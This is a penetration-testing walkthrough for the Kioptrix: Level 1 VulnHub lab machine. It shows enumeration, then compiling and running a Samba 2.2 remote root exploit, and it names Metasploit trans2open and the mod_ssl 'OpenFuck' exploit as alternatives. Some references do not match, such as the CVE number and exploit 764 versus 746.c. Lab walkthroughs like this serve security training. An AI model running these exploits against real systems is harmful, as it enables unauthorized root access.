Penetration testing

Kioptrix: Level 1 - Walkthrough

Chiragh Dewan
May 15, 2017 by
Chiragh Dewan

Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root's email.

For the attacking machine, I will be using Kali 2017.1.

Earn two pentesting certifications at once!

Earn two pentesting certifications at once!

Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let's start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 - Running OpenSSH
  • Port 80 - Running Apache Web server
  • Port 111 - Running RPC
  • Port 139 - Running Samba
  • Port 443 - Running Apache. We server over ssl
  • Port 1024 - Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I am given the final file proper permissions:

$ chmod 755 samba

Let's dry run the exploit and see what all parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:

While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was via exploit mod_ssl (CVE 2002 - 0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.

Let's exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Chiragh Dewan
Chiragh Dewan

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.